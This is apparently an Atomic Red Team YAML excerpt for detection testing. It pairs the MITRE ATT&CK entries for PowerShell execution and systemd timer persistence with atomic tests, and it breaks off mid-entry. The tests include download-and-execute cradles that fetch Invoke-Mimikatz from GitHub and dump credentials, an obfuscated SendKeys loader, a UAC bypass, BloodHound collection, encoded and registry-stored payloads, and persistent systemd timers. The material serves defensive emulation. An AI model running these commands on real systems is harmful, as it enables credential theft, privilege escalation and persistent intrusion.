- source_name: SilentBreak Offensive PS Dec 2015
description: Christensen, L.. (2015, December 28). The Evolution of Offensive
PowerShell Invocation. Retrieved December 8, 2018.
url: https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
- source_name: FireEye PowerShell Logging 2016
description: Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH
POWERSHELL LOGGING. Retrieved February 16, 2016.
url: https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
- source_name: Github PSAttack
description: Haight, J. (2016, April 21). PS>Attack. Retrieved September 27,
2024.
url: https://github.com/Exploit-install/PSAttack-1
- source_name: inv_ps_attacks
description: Hastings, M. (2014, July 16). Investigating PowerShell Attacks.
Retrieved December 1, 2021.
url: https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/
- source_name: Malware Archaeology PowerShell Cheat Sheet
description: Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING
CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.
url: http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf
- source_name: TechNet PowerShell
description: Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April
28, 2016.
url: https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx
- source_name: Sixdub PowerPick Jan 2016
description: Warner, J.. (2015, January 6). Inexorable PowerShell – A Red
Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December
8, 2018.
url: https://web.archive.org/web/20160327101330/http://www.sixdub.net/?p=367
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:07.660Z'
name: 'Command and Scripting Interpreter: PowerShell'
description: |-
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mayuresh Dani, Qualys
- Praetorian
- Ross Brittain
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.5'
x_mitre_remote_support: false
identifier: T1059.001
atomic_tests:
- name: Mimikatz
auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027
description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz
dump details and password hashes will be displayed.
'
supported_platforms:
- windows
input_arguments:
mimurl:
description: Mimikatz url
type: url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
Invoke-Mimikatz -DumpCreds"
'
name: command_prompt
elevation_required: true
- name: Run BloodHound from local disk
auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350
description: |
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'SharpHound.ps1 must be located at "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
executor:
command: |
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
'
name: powershell
- name: Run Bloodhound from Memory using Download Cradle
auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
description: |
Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file.
supported_platforms:
- windows
executor:
command: |
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
'
name: powershell
- name: Mimikatz - Cradlecraft PsSendKeys
auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d
description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions
will take place to open file explorer, open notepad and input code, then mimikatz
dump info will be displayed.
'
supported_platforms:
- windows
executor:
command: "$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object
-ComObject WScript.Shell;$reg='HKCU:\\Software\\Microsoft\\Notepad';$app='Notepad';$props=(Get-ItemProperty
$reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP
$reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item
Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep
-Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds
500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable
_).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item
Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable
_).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item
Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP
$reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz
-dumpcr\n"
name: powershell
elevation_required: true
- name: Invoke-AppPathBypass
auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372
description: |
Note: Windows 10 only. Upon execution windows backup and restore window will be opened.
Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
supported_platforms:
- windows
executor:
command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
'
name: command_prompt
- name: Powershell MsXml COM object - with prompt
auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
description: |
Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1
executor:
command: 'powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject
MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
$comMsXml.ResponseText"
'
name: command_prompt
- name: Powershell XML requests
auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
description: |
Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml
executor:
command: '"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec
bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
| IEX"
'
name: command_prompt
- name: Powershell invoke mshta.exe download
auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
description: |
Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
Provided by https://github.com/mgreen27/mgreen27.github.io
supported_platforms:
- windows
input_arguments:
url:
description: url of payload to execute
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct
executor:
command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
'
name: command_prompt
- name: Powershell Invoke-DownloadCradle
auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
description: |
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
supported_platforms:
- windows
executor:
steps: |
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
name: manual
- name: PowerShell Fileless Script Execution
auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73
description: |
Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
art-marker.txt is in the folder.
supported_platforms:
- windows
executor:
command: |
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
cleanup_command: |
Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore
Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
name: powershell
- name: NTFS Alternate Data Stream Access
auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
description: 'Creates a file with an alternate data stream and simulates executing
that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
'
supported_platforms:
- windows
input_arguments:
ads_file:
description: File created to store Alternate Stream Data
type: string
default: "$env:TEMP\\NTFS_ADS.txt"
dependencies:
- description: 'Homedrive must be an NTFS drive
'
prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem
-contains "NTFS") {exit 0} else {exit 1}
'
get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically
'
executor:
name: powershell
command: |
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
'
- name: PowerShell Session Creation and Use
auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
description: |
Connect to a remote powershell session and interact with the host.
Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed.
supported_platforms:
- windows
input_arguments:
hostname_to_connect:
description: The host to connect to, by default it will connect to the local
machine
type: string
default: "$env:COMPUTERNAME"
dependencies:
- description: 'PSRemoting must be enabled
'
prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect}
-ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n"
get_prereq_command: 'Enable-PSRemoting
'
executor:
name: powershell
elevation_required: true
command: |
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
- name: ATHPowerShellCommandLineParameter -Command parameter variations
auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7
description: Executes powershell.exe with variations of the -Command parameter
supported_platforms:
- windows
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: string
default: Hyphen
command_param_variation:
description: The "Command" parameter variation to use
type: string
default: C
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-CommandParamVariation #{command_param_variation} -Execute -ErrorAction
Stop'
name: powershell
- name: ATHPowerShellCommandLineParameter -Command parameter variations with encoded
arguments
auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790
description: Executes powershell.exe with variations of the -Command parameter
with encoded arguments supplied
supported_platforms:
- windows
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: string
default: Hyphen
command_param_variation:
description: The "Command" parameter variation to use
type: string
default: C
encoded_arguments_param_variation:
description: The "EncodedArguments" parameter variation to use
type: string
default: EA
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
#{encoded_arguments_param_variation} -Execute -ErrorAction Stop'
name: powershell
- name: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
auto_generated_guid: 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
description: Executes powershell.exe with variations of the -EncodedCommand
parameter
supported_platforms:
- windows
input_arguments:
command_line_switch_type:
description: The type of supported command-line switch to use
type: string
default: Hyphen
encoded_command_param_variation:
description: The "EncodedCommand" parameter variation to use
type: string
default: E
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
-ErrorAction Stop'
name: powershell
- name: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations
with encoded arguments
auto_generated_guid: 0d181431-ddf3-4826-8055-2dbf63ae848b
description: Executes powershell.exe with variations of the -EncodedCommand
parameter with encoded arguments supplied
supported_platforms:
- windows
input_arguments:
encoded_command_param_variation:
description: The "EncodedCommand" parameter variation to use
type: string
default: E
command_line_switch_type:
description: The type of supported command-line switch to use
type: string
default: Hyphen
encoded_arguments_param_variation:
description: The "EncodedArguments" parameter variation to use
type: string
default: EncodedArguments
dependencies:
- description: The AtomicTestHarnesses module must be installed and Out-ATHPowerShellCommandLineParameter
must be exported in the module.
prereq_command: |-
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
'
executor:
command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
-EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
-EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute
-ErrorAction Stop'
name: powershell
- name: PowerShell Command Execution
auto_generated_guid: a538de64-1c74-46ed-aa60-b995ed302598
description: 'Use of obfuscated PowerShell to execute an arbitrary command;
outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
Report by Red Canary.
'
supported_platforms:
- windows
input_arguments:
obfuscated_code:
description: 'Defaults to: Invoke-Expression with a "Write-Host" line.'
type: string
default: JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==
executor:
command: 'powershell.exe -e #{obfuscated_code}
'
name: command_prompt
- name: PowerShell Invoke Known Malicious Cmdlets
auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
description: Powershell execution of known Malicious PowerShell Cmdlets
supported_platforms:
- windows
input_arguments:
Malicious_cmdlets:
description: Known Malicious Cmdlets
type: string
default: '"Add-Persistence", "Find-AVSignature", "Get-GPPAutologon", "Get-GPPPassword",
"Get-HttpStatus", "Get-Keystrokes", "Get-SecurityPackages", "Get-TimedScreenshot",
"Get-VaultCredential", "Get-VolumeShadowCopy", "Install-SSP", "Invoke-CredentialInjection",
"Invoke-DllInjection", "Invoke-Mimikatz", "Invoke-NinjaCopy", "Invoke-Portscan",
"Invoke-ReflectivePEInjection", "Invoke-ReverseDnsLookup", "Invoke-Shellcode",
"Invoke-TokenManipulation", "Invoke-WmiCommand", "Mount-VolumeShadowCopy",
"New-ElevatedPersistenceOption", "New-UserPersistenceOption", "New-VolumeShadowCopy",
"Out-CompressedDll", "Out-EncodedCommand", "Out-EncryptedScript", "Out-Minidump",
"PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy",
"Set-CriticalProcess", "Set-MasterBootRecord"
'
executor:
name: powershell
elevation_required: true
command: |
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
- name: PowerUp Invoke-AllChecks
auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia
'
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
name: powershell
- name: Abuse Nslookup with DNS Records
auto_generated_guid: 999bff6d-dc15-44c9-9f5c-e1051bfc86e1
description: |
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts.
[reference](https://twitter.com/jstrosch/status/1237382986557001729)
supported_platforms:
- windows
executor:
command: |
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
name: powershell
- name: SOAPHound - Dump BloodHound Data
auto_generated_guid: 6a5b2a50-d037-4879-bf01-43d4d6cbf73f
description: |
Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory.
src: https://github.com/FalconForceTeam/SOAPHound
supported_platforms:
- windows
input_arguments:
user:
description: Username for authentication
type: string
default: "$env:USERNAME"
password:
description: Password for authentication
type: string
default: P@ssword1
domain:
description: Domain for authentication
type: string
default: "$env:USERDOMAIN"
dc:
description: Domain Controller IP
type: string
default: 10.0.1.14
cachefilename:
description: Cache filename
type: string
default: c:\temp\cache.txt
outputdirectory:
description: Output directory
type: string
default: c:\temp\test2
soaphound_path:
description: Path to SOAPHound binary
type: string
default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe
executor:
command: "#{soaphound_path} --user #{user} --password #{password} --domain
#{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory
#{outputdirectory}\n"
name: powershell
- name: SOAPHound - Build Cache
auto_generated_guid: 4099086c-1470-4223-8085-8186e1ed5948
description: |
Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename.
src: https://github.com/FalconForceTeam/SOAPHound
supported_platforms:
- windows
input_arguments:
user:
description: Username for authentication
type: string
default: "$env:USERNAME"
password:
description: Password for authentication
type: string
default: P@ssword1
domain:
description: Domain for authentication
type: string
default: "$env:USERDOMAIN"
dc:
description: Domain Controller IP
type: string
default: 10.0.1.14
cachefilename:
description: Cache filename
type: string
default: c:\temp\cache.txt
soaphound_path:
description: Path to SOAPHound binary
type: string
default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe
executor:
command: "#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password}
--dc #{dc} --buildcache --cachefilename #{cachefilename}\n"
name: powershell
T1053.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
created: '2020-10-12T17:50:31.584Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1053/006
external_id: T1053.006
- source_name: Systemd Remote Control
description: Aaron Kili. (2018, January 16). How to Control Systemd Services
on Remote Linux Server. Retrieved July 26, 2021.
url: https://www.tecmint.com/control-systemd-services-on-remote-linux-server/
- source_name: archlinux Systemd Timers Aug 2020
description: archlinux. (2020, August 11). systemd/Timers. Retrieved October
12, 2020.
url: https://wiki.archlinux.org/index.php/Systemd/Timers
- source_name: gist Arch package compromise 10JUL2018
description: Catalin Cimpanu. (2018, July 10). ~x file downloaded in public
Arch package compromise. Retrieved April 23, 2019.
url: https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a
- source_name: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018
description: Catalin Cimpanu. (2018, July 10). Malware Found in Arch Linux
AUR Package Repository. Retrieved April 23, 2019.
url: https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/
- source_name: acroread package compromised Arch Linux Mail 8JUL2018
description: Eli Schwartz. (2018, June 8). acroread package compromised. Retrieved
April 23, 2019.
url: https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html
- source_name: 'Falcon Sandbox smp: 28553b3a9d'
description: Hybrid Analysis. (2018, July 11). HybridAnalsysis of sample 28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7.
Retrieved September 8, 2023.
url: https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300
- source_name: 'Linux man-pages: systemd January 2014'
description: Linux man-pages. (2014, January). systemd(1) - Linux manual page.
Retrieved April 23, 2019.
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:11.261Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
Each .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.
An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- SarathKumar Rajendran, Trimble Inc
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
x_mitre_version: '1.3'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b
description: "This test creates Systemd service and timer then starts and enables
the Systemd timer \n"
supported_platforms:
- linux
input_arguments:
path_to_systemd_service:
description: Path to systemd service unit file
type: path
default: "/etc/systemd/system/art-timer.service"
path_to_systemd_timer:
description: Path to service timer file
type: path
default: "/etc/systemd/system/art-timer.timer"
systemd_service_name:
description: Name of systemd service
type: string
default: art-timer.service
systemd_timer_name:
description: Name of systemd service timer
type: string
default: art-timer.timer
executor:
command: |
echo "[Unit]" > #{path_to_systemd_service}
echo "Description=Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_service}
echo "[Service]" >> #{path_to_systemd_service}
echo "Type=simple" >> #{path_to_systemd_service}
echo "ExecStart=/bin/touch /tmp/art-systemd-timer-marker" >> #{path_to_systemd_service}
echo "[Install]" >> #{path_to_systemd_service}
echo "WantedBy=multi-user.target" >> #{path_to_systemd_service}
echo "[Unit]" > #{path_to_systemd_timer}
echo "Description=Executes Atomic Red Team Systemd Timer Service" >> #{path_to_systemd_timer}
echo "Requires=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "[Timer]" >> #{path_to_systemd_timer}
echo "Unit=#{systemd_service_name}" >> #{path_to_systemd_timer}
echo "OnCalendar=*-*-* *:*:00" >> #{path_to_systemd_timer}
echo "[Install]" >> #{path_to_systemd_timer}
echo "WantedBy=timers.target" >> #{path_to_systemd_timer}
systemctl start #{systemd_timer_name}
systemctl enable #{systemd_timer_name}
systemctl daemon-reload
cleanup_command: |
systemctl stop #{systemd_timer_name}
systemctl disable #{systemd_timer_name}
rm #{path_to_systemd_service}
rm #{path_to_systemd_timer}
systemctl daemon-reload
name: bash
elevation_required: true
- name: Create a user level transient systemd service and timer
auto_generated_guid: 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec
description: "Schedule a user level transient task (will not survive a reboot)
without having to create the .timer or .service files by using the systemd-run
command. \n"
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if systemd-run exists on the machine
'
prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else
exit 1; fi;
'
get_prereq_command: 'echo "Install systemd on the machine."; exit 1;
'
executor:
